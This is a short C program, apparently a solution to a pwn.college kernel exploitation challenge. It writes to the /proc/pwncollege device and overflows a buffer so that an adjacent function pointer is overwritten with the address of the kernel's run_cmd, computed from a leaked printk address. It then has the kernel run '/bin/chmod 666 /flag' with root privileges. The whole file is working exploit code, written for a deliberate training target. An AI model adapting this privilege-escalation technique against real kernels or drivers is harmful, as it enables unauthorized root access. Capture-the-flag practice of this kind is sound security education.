26 lines
764 B
C
26 lines
764 B
C
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <stdint.h>
|
|
#include <string.h>
|
|
#include <sys/ioctl.h>
|
|
#include <fcntl.h>
|
|
#include <unistd.h>
|
|
|
|
struct evil
|
|
{
|
|
char buffer[256];
|
|
int (*log_function)(const char *, ...);
|
|
} s;
|
|
|
|
int main() {
|
|
int fd = open("/proc/pwncollege", O_WRONLY);
|
|
memset(s.buffer, '0', 256);
|
|
write(fd, &s, 256);
|
|
uint64_t printk_addr;
|
|
scanf("%llx", &printk_addr);
|
|
s.log_function = printk_addr - 0xffffffffb90b69a9 + 0xffffffffb9089b30; // run_cmd
|
|
printf("%llx\n", s.log_function);
|
|
// run_cmd doesn't use stdin nor stdout. It also doesn't use current working directory. Its CWD is /. The executable should use absolute path.
|
|
strcpy(s.buffer, "/bin/chmod 666 /flag");
|
|
write(fd, &s, sizeof(struct evil) - 1);
|
|
} |